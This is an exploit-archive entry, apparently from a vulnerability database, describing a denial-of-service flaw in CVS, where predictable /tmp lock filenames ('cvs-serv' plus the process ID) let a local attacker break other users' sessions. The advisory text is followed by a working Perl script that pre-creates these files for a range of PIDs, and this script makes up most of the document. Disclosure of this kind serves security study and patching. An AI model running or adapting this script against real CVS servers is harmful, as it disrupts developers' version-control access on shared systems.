16 lines
No EOL
1 KiB
Perl
Executable file
16 lines
No EOL
1 KiB
Perl
Executable file
source: http://www.securityfocus.com/bid/1136/info
|
|
|
|
CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken.
|
|
|
|
The following perl script will create many directories in /tmp with incrementing pids:
|
|
|
|
#!/usr/bin/perl
|
|
|
|
$min=400;
|
|
$max=4000;
|
|
|
|
for ($x=$min;$x<=$max;$x++) {
|
|
open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
|
|
chmod 0600, "/tmp/cvs-serv$x";
|
|
close CVSTMP;
|
|
} |